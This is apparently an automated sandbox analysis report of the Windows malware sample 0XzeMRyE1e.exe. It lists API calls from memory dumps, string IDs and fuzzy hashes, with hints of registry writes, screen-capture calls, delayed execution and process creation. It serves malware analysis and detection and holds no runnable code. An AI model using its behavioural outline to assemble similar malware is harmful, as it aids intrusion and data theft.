                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041FB30
                                                                                • _free.LIBCMT ref: 0041FB3B
                                                                                • _free.LIBCMT ref: 0041FB8F
                                                                                • _free.LIBCMT ref: 0041FB9A
                                                                                • _free.LIBCMT ref: 0041FBA5
                                                                                • _free.LIBCMT ref: 0041FBB0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00415428,?,?,004153F0,004053F0,00000000,?), ref: 00415448
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041545B
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00415428,?,?,004153F0,004053F0,00000000,?), ref: 0041547E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$k8A$mscoree.dll
                                                                                • API String ID: 4061214504-1057185992
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(?,004053F0,00000000), ref: 0041B6CF
                                                                                • __fassign.LIBCMT ref: 0041B8AE
                                                                                • __fassign.LIBCMT ref: 0041B8CB
                                                                                • WriteFile.KERNEL32(?,004053F0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B913
                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041B953
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B9FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                • String ID:
                                                                                • API String ID: 4031098158-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strrchr
                                                                                • String ID: )eA
                                                                                • API String ID: 3213747228-3515632281
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,0041406B,00413ED9,004137E8), ref: 00414082
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00414090
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004140A9
                                                                                • SetLastError.KERNEL32(00000000,0041406B,00413ED9,004137E8), ref: 004140FB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • C:\Users\user\Desktop\0XzeMRyE1e.exe, xrefs: 0041E6CD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                                • API String ID: 0-3537543806
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcsrchr
                                                                                • String ID: .bat$.cmd$.com$.exe
                                                                                • API String ID: 1752292252-4019086052
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: api-ms-
                                                                                • API String ID: 0-2084034818
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 0041FA4E
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041FA60
                                                                                • _free.LIBCMT ref: 0041FA72
                                                                                • _free.LIBCMT ref: 0041FA84
                                                                                • _free.LIBCMT ref: 0041FA96
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: *?
                                                                                • API String ID: 269201875-2564092906
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004120D0: Concurrency::cancel_current_task.LIBCPMT ref: 00412184
                                                                                  • Part of subcall function 00402150: RegOpenKeyExA.KERNEL32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
                                                                                  • Part of subcall function 00402150: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
                                                                                  • Part of subcall function 00402150: RegCloseKey.KERNEL32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2
                                                                                  • Part of subcall function 00402150: RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 004024D9
                                                                                  • Part of subcall function 00402150: RegSetValueExA.KERNEL32(80000001,?,00000000,00000001,?,?), ref: 00402507
                                                                                  • Part of subcall function 00402150: RegCloseKey.ADVAPI32(80000001), ref: 00402510
                                                                                  • Part of subcall function 004059C0: GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 004059EF
                                                                                  • Part of subcall function 00402150: GdiplusStartup.GDIPLUS(?,?,00000000,?,?,?), ref: 0040261B
                                                                                  • Part of subcall function 00402150: GetDC.USER32(00000000), ref: 00402702
                                                                                  • Part of subcall function 00402150: RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 00402934
                                                                                  • Part of subcall function 00402150: GetSystemMetrics.USER32 ref: 00402977
                                                                                  • Part of subcall function 00402150: GetSystemMetrics.USER32 ref: 00402984
                                                                                • Sleep.KERNEL32(00057E40), ref: 00411561
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseMetricsOpenSystem$Concurrency::cancel_current_taskGdiplusPathQuerySleepStartupTemp
                                                                                • String ID: 425620883392$91CCA1C9$A2D594D46F67
                                                                                • API String ID: 711646717-2198538293
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 0042495E
                                                                                • _free.LIBCMT ref: 00424987
                                                                                • SetEndOfFile.KERNEL32(00000000,00420D75,00000000,004196CE,?,?,?,?,?,?,?,00420D75,004196CE,00000000), ref: 004249B9
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00420D75,004196CE,00000000,?,?,?,?,00000000), ref: 004249D5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 1547350101-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004158B7: _free.LIBCMT ref: 004158C5
                                                                                  • Part of subcall function 0041F00B: WideCharToMultiByte.KERNEL32(004053F0,00000000,00432BE8,00000000,004053F0,004053F0,0041C017,?,00432BE8,?,00000000,?,0041BD86,0000FDE9,00000000,?), ref: 0041F0AD
                                                                                • GetLastError.KERNEL32 ref: 0041E09C
                                                                                • __dosmaperr.LIBCMT ref: 0041E0A3
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041E0E2
                                                                                • __dosmaperr.LIBCMT ref: 0041E0E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                • String ID:
                                                                                • API String ID: 167067550-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(004053F0,004053F0,00801F0F,0041BACD,?,004053F0,00432BE8,?,0041BF8C,004053F0,00000000,004053F0,004053F0,004053F0,00000000,00000000), ref: 0041A127
                                                                                • _free.LIBCMT ref: 0041A184
                                                                                • _free.LIBCMT ref: 0041A1BA
                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0041BF8C,004053F0,00000000,004053F0,004053F0,004053F0,00000000,00000000,?,004156F5,00000000,00432BE8), ref: 0041A1C5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00412EFB,00412EFB,?,0041643C,00419D5D,?,?,00413B2E,?,?,?,?,?,00412DCB,00412EFB,?), ref: 0041A27E
                                                                                • _free.LIBCMT ref: 0041A2DB
                                                                                • _free.LIBCMT ref: 0041A311
                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00413B2E,?,?,?,?,?,00412DCB,00412EFB,?,?,?,?), ref: 0041A31C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041AAD1,00000000,?,00421435,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0041A982
                                                                                • GetLastError.KERNEL32(?,00421435,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0041AAD1,00000000,00000104,?), ref: 0041A98C
                                                                                • __dosmaperr.LIBCMT ref: 0041A993
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2398240785-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041AAD1,00000000,?,004213C0,00000000,00000000,0041AAD1,?,?,00000000,00000000,00000001), ref: 0041A9EB
                                                                                • GetLastError.KERNEL32(?,004213C0,00000000,00000000,0041AAD1,?,?,00000000,00000000,00000001,00000000,00000000,?,0041AAD1,00000000,00000104), ref: 0041A9F5
                                                                                • __dosmaperr.LIBCMT ref: 0041A9FC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2398240785-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteConsoleW.KERNEL32(004053F0,00000000,00432BE8,00000000,004053F0,?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0), ref: 00424DCC
                                                                                • GetLastError.KERNEL32(?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0,00000000,004053F0,?,0041BFB0,004053F0), ref: 00424DD8
                                                                                  • Part of subcall function 00424D9E: CloseHandle.KERNEL32(FFFFFFFE,00424DE8,?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0,00000000,004053F0), ref: 00424DAE
                                                                                • ___initconout.LIBCMT ref: 00424DE8
                                                                                  • Part of subcall function 00424D60: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00424D8F,004221EC,004053F0,?,0041BA5C,00000000,?,004053F0,00000000), ref: 00424D73
                                                                                • WriteConsoleW.KERNEL32(004053F0,00000000,00432BE8,00000000,?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0,00000000), ref: 00424DFD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                • String ID:
                                                                                • API String ID: 2744216297-0
                                                                                • Opcode ID: e6ed42e9dcef8d0bdb4e0254b1a8b2f08fb405fd5705a56b80d057d723c09720
                                                                                • Instruction ID: 0cc13d065ee9562ea82690d47d7b82c2f0896ceb846607bba80986283eb887b7
                                                                                • Opcode Fuzzy Hash: e6ed42e9dcef8d0bdb4e0254b1a8b2f08fb405fd5705a56b80d057d723c09720
                                                                                • Instruction Fuzzy Hash: A6F01236210124BBCF225FA1FC04A8F3F26FF85760B454025FA2895130D73199209BD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 00418A98
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 00418AAB
                                                                                • _free.LIBCMT ref: 00418ABC
                                                                                • _free.LIBCMT ref: 00418ACD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 50086bc83856b29656b0ece8d7704e3f04f792345031d19d6221faf59f2b188f
                                                                                • Instruction ID: fd34e3d3b8f1add97e935abd5073eef0e6781f19382a81a21b394bce4158e547
                                                                                • Opcode Fuzzy Hash: 50086bc83856b29656b0ece8d7704e3f04f792345031d19d6221faf59f2b188f
                                                                                • Instruction Fuzzy Hash: 52E04D70820A609B8A02BF22BC4188DBB75BB19B04750303BF41002279C73A5A92DF8C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,?,00000000), ref: 004056DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PathTemp
                                                                                • String ID: A4D2A1A693AA93$hPQC
                                                                                • API String ID: 2920410445-398287527
                                                                                • Opcode ID: 5bf5c21e2be614ab82f3f5f3a896203fb6bd4e5d22a4b5591fc08d45ba755d46
                                                                                • Instruction ID: df550c7eb2918b25f62d0ce81e9b540fa1cb3ffd44ed576d960a7f926b30a9ae
                                                                                • Opcode Fuzzy Hash: 5bf5c21e2be614ab82f3f5f3a896203fb6bd4e5d22a4b5591fc08d45ba755d46
                                                                                • Instruction Fuzzy Hash: 6BC13C71E001089BDF08EF68CD857EEBB76EF85304F50816DE804A73C5DB799A918B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 004122D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task
                                                                                • String ID: aC$IC
                                                                                • API String ID: 118556049-1397272051
                                                                                • Opcode ID: 6ec4015f9153290efd7cbd59547a6219cdc2aeff093f395eedf6cab30c7f734c
                                                                                • Instruction ID: 84314422f65998bf548c1bbd6e13f26cb2672e95d21e19c1100c3b538eee8e7f
                                                                                • Opcode Fuzzy Hash: 6ec4015f9153290efd7cbd59547a6219cdc2aeff093f395eedf6cab30c7f734c
                                                                                • Instruction Fuzzy Hash: CE3154727002045BC718DE6CCA805AEB2D6AB88320760437FE51AC37D1EBB8CDF18399
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                                • API String ID: 0-3537543806
                                                                                • Opcode ID: 1ad5b2d83d0d7437ad3fbfbc1364292ac2a8272f74641c11a38da502a312962f
                                                                                • Instruction ID: 5627b466fc16fe25a6ac73c6d83cd0dce1d46dc0158702ade6124cbd8f36eb7a
                                                                                • Opcode Fuzzy Hash: 1ad5b2d83d0d7437ad3fbfbc1364292ac2a8272f74641c11a38da502a312962f
                                                                                • Instruction Fuzzy Hash: E8418471A00614AFDB129B9ACD819EFBBB8EF95710F1400AFF804A7211DB749E81C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004158B7: _free.LIBCMT ref: 004158C5
                                                                                  • Part of subcall function 00419D68: MultiByteToWideChar.KERNEL32(0041EE3F,00000100,E8458D00,00000000,00000000,00000020,?,0041FC08,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 00419DD8
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041596E,00000000,?,00000000,76C86490), ref: 0041578A
                                                                                • __dosmaperr.LIBCMT ref: 00415791
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr_free
                                                                                • String ID: nYA
                                                                                • API String ID: 4030486722-3618285603
                                                                                • Opcode ID: 1bd6245e1b783a69f019b7247750bbf715c608d024b32d772ea12df75f49ce99
                                                                                • Instruction ID: 4e0ffe10194fbe2ed9143b2195adefa918b10e5e07c271b241dfb4d79dfb2861
                                                                                • Opcode Fuzzy Hash: 1bd6245e1b783a69f019b7247750bbf715c608d024b32d772ea12df75f49ce99
                                                                                • Instruction Fuzzy Hash: 9D21D871500A11EBCB21AF26CC029DB77A9AFC0374F11451BF839976D1D778E891CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00413A16
                                                                                • ___raise_securityfailure.LIBCMT ref: 00413AFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                • String ID: `VC
                                                                                • API String ID: 3761405300-3030579402
                                                                                • Opcode ID: 88cca52f03d3994def1460f4c1c68c41a99f6ced113eff2d7c52e2e230f43919
                                                                                • Instruction ID: 655513bd97cfb9c56dfb21943b7c2d82163dca5128fe96feb08d75d27f7ac2b0
                                                                                • Opcode Fuzzy Hash: 88cca52f03d3994def1460f4c1c68c41a99f6ced113eff2d7c52e2e230f43919
                                                                                • Instruction Fuzzy Hash: 8F21D0B4610B04DAE714DF15FA86A947BE4FB48314FA4753AE6088B3A0E3B49585CF4D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,00412F09,?,00432AAC,00431D7C,?,00431D7C,00000001), ref: 00413BE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID: /A$k8A
                                                                                • API String ID: 3997070919-3859516898
                                                                                • Opcode ID: 794ae15e6e0db31f4291640b4f98a2b51644340bbcec8a8c6aa1363c38b5e95a
                                                                                • Instruction ID: 3da1a0905b8d33730f3829acd1f08bb64e64d6195ac3a8dc0638a79db0c406ed
                                                                                • Opcode Fuzzy Hash: 794ae15e6e0db31f4291640b4f98a2b51644340bbcec8a8c6aa1363c38b5e95a
                                                                                • Instruction Fuzzy Hash: 9E018F31A00209ABC7119F58D894BEEBBB8FF48754F15405AE914AB391E7B4BE41CBD0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0041944F,-00000020,00000FA0,00000000,004053E3,?,00431DE8), ref: 0041A721
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                • String ID: InitializeCriticalSectionEx$k8A
                                                                                • API String ID: 2593887523-2382381216
                                                                                • Opcode ID: 3391b520c6901bc352ec01796cd00a3413996bd9626c6c132cfced3b2acc6b63
                                                                                • Instruction ID: 6a9a2a883630116b5a7302b714e21f7e52d919c2a86b10e74dfab1277b4aa897
                                                                                • Opcode Fuzzy Hash: 3391b520c6901bc352ec01796cd00a3413996bd9626c6c132cfced3b2acc6b63
                                                                                • Instruction Fuzzy Hash: 2EE0223124022CB7CF112F40EC09EEE7F25EB847A0F508022F91815160C7B98931ABD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Alloc
                                                                                • String ID: FlsAlloc$k8A
                                                                                • API String ID: 2773662609-3139832701
                                                                                • Opcode ID: 2dbc92310dfbe542a28b011b768efe413cf7707e9ab2d0817eca46dc4197000f
                                                                                • Instruction ID: 38852a9917cd94aa95cdbbe9751c97fbcfd74d9f8f148c69fb3bd545895d8ad7
                                                                                • Opcode Fuzzy Hash: 2dbc92310dfbe542a28b011b768efe413cf7707e9ab2d0817eca46dc4197000f
                                                                                • Instruction Fuzzy Hash: D9E0CD36741235B3D62127516C0EA9EBF08C7C0BA0B584033F909611419BDC08618ADE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:16.9%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:263
                                                                                Total number of Limit Nodes:16

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node 8927a78-8927b0d]
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08927CAE
                                                                                Memory Dump Source
